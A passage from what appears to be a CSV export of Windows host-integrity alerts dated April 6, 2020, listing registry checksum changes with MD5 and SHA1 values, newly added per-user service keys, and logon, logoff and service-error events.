'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:39:36.709",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '320bb6f0c3f0f9ca6201376818440454' +New md5sum is : 'b132e65b4963a54ebee91bcab8914621' +Old sha1sum was: '6f0a84fcaed413ed440ea1ba902efe1c0d69c1ef' +New sha1sum is : '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +" +"Apr 6, 2020 @ 14:39:35.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '00f520782a4ab535f2911267c06438d9' +New md5sum is : 'f6949813e6b9d992278b95b7f209e047' +Old sha1sum was: 'bff3f6156b18df9a1ad0d484b5296bda6e699299' +New sha1sum is : '8db1fc943f83c30b4bc07f1ed394492c392e7722' +" +"Apr 6, 2020 @ 14:39:35.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '8e9cef389829897cea6eca230b2aa97f' +New md5sum is : '342765c52f3fd7b50e5188adb30a0ede' +Old sha1sum was: 'cc8206466c207f0619ed289d336d1d965992e198' +New sha1sum is : '6d803f7cc7de0ae861402e45b8a1442595a4b544' +" +"Apr 6, 2020 @ 14:39:34.678",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:39:32.819",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '05e13bdf1f9b7eb3a1f3de4ca253e89f' +New md5sum is : 'bb30a4865d0fe96a2d7b53b843e8fa0a' +Old sha1sum was: 'feaa05d6b5b4ac5a77156e9c4c2199f6a91a5917' +New sha1sum is : '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +" +"Apr 6, 2020 @ 14:39:29.226",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '3d3a643354245020081ae89e531e5f43' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +" +"Apr 6, 2020 @ 14:39:27.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '646af30f5e20cdfc4f2c28c8e09ff02c' +New md5sum is : 'b6d3909639832341a734894d33f7c650' +Old sha1sum was: '218e9b8a8ae906e403df7e730096ad92886a7c1c' +New sha1sum is : 'f68965cba98e801d041406d6307c4869db9673a4' +" +"Apr 6, 2020 @ 14:39:26.787",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: 'b0d74b8b9da27bf097def0edef51976a' +New md5sum is : '1671bba53566796b1903734f3349f205' +Old sha1sum was: '85c2962a659d70880b1f863906002042ff403691' +New sha1sum is : '708d4d45b3b663519de7d168bcad8f1b3c5b0c7a' +" +"Apr 6, 2020 @ 14:39:26.726",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '671078222c6f28f8a987ef233af7d5a5' +New md5sum is : '5de0ef21cee3c7b87f2fab30b8b06e2e' +Old sha1sum was: 'c62d69328b5a046dd8494e6a38df8074f8310102' +New sha1sum is : '95450da791d27d0a0e456663988211c24b30dbec' +" +"Apr 6, 2020 @ 14:39:26.710",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '73c63a01a46264ab050a9804c4648382' +New md5sum is : '67b63b70acc4cf09439b0064f5375078' +Old sha1sum was: '5ef9fab8416ce4431f5ef1872f0a97ec347b05b6' +New sha1sum is : 'd5ad2ffed235439932f7b3d18a9d28ffe83d1079' +" +"Apr 6, 2020 @ 14:39:22.308",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +" +"Apr 6, 2020 @ 14:39:18.428",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:39:12.928",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:39:11.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '1e6e38e0129cb1178036ce2d2de63896' +New md5sum is : '56e9f0a7add3da7f007b812f71fed075' +Old sha1sum was: 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +New sha1sum is : 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +" +"Apr 6, 2020 @ 14:39:11.162",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'e8e23284dccb7ccee8c1c0f3d044aca0' +New md5sum is : 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +Old sha1sum was: 'b6870b3d74893979c44b3336a301dce27cd672f1' +New sha1sum is : 'f01eba6dbe74107285007351b77304e1a19bc18e' +" +"Apr 6, 2020 @ 14:39:10.163",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: '03aad37d2328a1b41c130ad79ee23de7' +New md5sum is : 'a22f4624fc957eb22f371c4f482524df' +Old sha1sum was: '8f018594a2fffb11ad549b80854873098cfd2b7a' +New sha1sum is : '432b869a738326466b200cc25be6d8307cfdc040' +" +"Apr 6, 2020 @ 14:39:05.868",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: '578f6159462dbf35644b32173a6272dc' +New md5sum is : 'bad2d92e8c5f76681c68068d36d9f8de' +Old sha1sum was: '22d6c3d14484030a1223ac49b63a08d1adfb9f12' +New sha1sum is : 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +" +"Apr 6, 2020 @ 14:39:04.465",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:39:01.788",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '8c770c3cc590a59f4fec7b255faee1f2' +New md5sum is : '3879a39655c450780e274d024098bdb5' +Old sha1sum was: '327f74762b95e433a1a48c7b90680a4e0a0bce77' +New sha1sum is : '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +" +"Apr 6, 2020 @ 14:39:01.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'f906c668d9a9517e97299e9a3d5136fe' +New md5sum is : '91719a43ee1d9abe2cfbc1a69b82550c' +Old sha1sum was: '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +New sha1sum is : 'c9429e02ac797b3eeb56ad03665a88cc10366270' +" +"Apr 6, 2020 @ 14:38:57.881",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '8babdce3ab05d3473a80df927d06237f' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +" +"Apr 6, 2020 @ 14:38:54.224",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:50.318",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '84f9da38aef52b57b0f950a9bf807f50' +New md5sum is : 'a397028e02aba031e9a6ca6ee2322c66' +Old sha1sum was: 'da7ce1f2de2fac02702a496feefad65ff9721121' +New sha1sum is : 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +" +"Apr 6, 2020 @ 14:38:43.974",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '62adcc7d0cabf983a9a5489de147c514' +New md5sum is : '903b8f5bbc25f56d3fac80d5240a6156' +Old sha1sum was: '223860dda4c8b799b031b85964a111ab435e0f6f' +New sha1sum is : '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +" +"Apr 6, 2020 @ 14:38:41.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '584b2e2ecab9f7b853efa748028018d4698a2e87' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 6, 2020 @ 14:38:39.287",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:38.226",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:35.599",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:34.974",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3' +New md5sum is : '775174ea9bf25c40ba381ca284d7511d' +Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670' +New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475' +" +"Apr 6, 2020 @ 14:38:34.477",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:33.897",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '41f836f91bdb9b4b1a6dd53b45a586c1' +New md5sum is : '60dd34472b7c4b4733f08655c4f60df2' +Old sha1sum was: 'd88322091bdfa95dd00b43c94043be94669c10d6' +New sha1sum is : '525a1f729b820c37784c2e975a559deaf184ebb7' +" +"Apr 6, 2020 @ 14:38:33.880",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'd13ad6eb1737d32be81bf0fbad2ea850' +New md5sum is : '9f6b145dfd560fe21c8d05748910373f' +Old sha1sum was: 'd99b8a072444d528506f4a8568712fe5ddf19d83' +New sha1sum is : '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +" +"Apr 6, 2020 @ 14:38:33.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c3d3a1d8a57a3e55516e095343ffc85e' +New md5sum is : 'c07851f8f2e30eb65757347b948170ba' +Old sha1sum was: '3d8f8d08699f73356fd80de7e59de1c352109663' +New sha1sum is : '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +" +"Apr 6, 2020 @ 14:38:33.833",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '9db7d225f461184a37dd7daf55bd9455' +New md5sum is : 'dca242a1798caa2a9ae6de537858dfe3' +Old sha1sum was: '6ad64ec507008882176ba696c556974a828a8fce' +New sha1sum is : 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +" +"Apr 6, 2020 @ 14:38:33.367",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:38:19.052",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:38:19.007",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:38:17.364",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:38:17.334",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:38:16.990",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:54.525",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:54.478",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:51.171",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.151",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.127",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:51.072",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:50.027",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:37:48.807",9,"Windows Application error event", +"Apr 6, 2020 @ 14:37:34.197",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:34.165",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:37:32.182",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:37:32.136",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:37:32.025",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:53.087",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.869",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.858",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.807",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:36:51.776",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.759",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:51.743",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:36:50.665",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:36:49.665",9,"Windows Application error event", +"Apr 6, 2020 @ 14:35:53.401",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.385",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.361",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:35:53.329",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:53.314",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:53.276",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:35:52.055",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:35:50.307",9,"Windows Application error event", +"Apr 6, 2020 @ 14:35:49.352",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\5\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:35:49.336",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\4\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:35:46.450",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:46.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:46.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:46.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.767",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:45.737",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.588",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:35:45.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:35:45.422",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:35:45.256",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:35:38.416",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'a45d92c5da48b32074d593f445bd1d73' +New md5sum is : '756dd006ccddd9a3acb123069bbf2b72' +Old sha1sum was: '7ad132c3e4354ce6748313a2eaf72d08a7d0ac2a' +New sha1sum is : 'ad92ac4e2be1d65930f4d4ed78dab3ae8577c070' +" +"Apr 6, 2020 @ 14:35:38.382",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'e18c1ccf736dc8f14e0a245e1f699739' +New md5sum is : 'b0fa798f750e19e3ddbcd77f4321253f' +Old sha1sum was: 'f3d9e58c5181cea0e86c13a904867deadeab2b49' +New sha1sum is : '759d4aa41127af628c11a6761e1f5d9bdf9412ed' +" +"Apr 6, 2020 @ 14:35:35.905",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:35.871",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:35.838",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:35.794",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:35.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:35.756",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:34.489",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:34.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:34.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:34.415",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:34.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:34.384",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:25.617",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '5499f2465b93c7b9d2932c510d331d41' +New md5sum is : '646af30f5e20cdfc4f2c28c8e09ff02c' +Old sha1sum was: 'e252541cf73578cba0af49aaa7f38f21399e2f73' +New sha1sum is : '218e9b8a8ae906e403df7e730096ad92886a7c1c' +" +"Apr 6, 2020 @ 14:35:25.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '7f4e2820a9e8df5c63678e03b97248cc' +New md5sum is : '73c63a01a46264ab050a9804c4648382' +Old sha1sum was: '0b434b24c6b38ea405074bb98c33b674da54a900' +New sha1sum is : '5ef9fab8416ce4431f5ef1872f0a97ec347b05b6' +" +"Apr 6, 2020 @ 14:35:19.101",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:19.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:19.070",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:19.054",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:19.039",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:19.008",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:15.930",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.914",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:15.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:15.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:15.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.658",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:14.642",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:14.573",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:14.539",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:14.523",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:09.497",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:35:09.452",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:09.423",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:35:09.384",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759' was added. +" +"Apr 6, 2020 @ 14:35:09.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:09.320",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:35:08.339",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed' was added. +" +"Apr 6, 2020 @ 14:35:08.320",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:35:08.304",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:35:00.086",3,"IIS NetworkCleartext Logon Success", +"Apr 6, 2020 @ 14:34:57.656",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:57.617",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:57.539",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:53.962",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:53.948",5,"Windows System error event", +"Apr 6, 2020 @ 14:34:51.368",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.351",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.321",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:34:51.291",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:51.257",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:50.977",5,"Windows Push Notifications User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:50.960",5,"Connected Devices Platform User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:50.945",5,"Clipboard User Service_5eaf9d terminated unexpectedly", +"Apr 6, 2020 @ 14:34:43.195",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:43.179",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.164",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:43.148",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:43.132",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:43.102",5,"File added to the system.","File 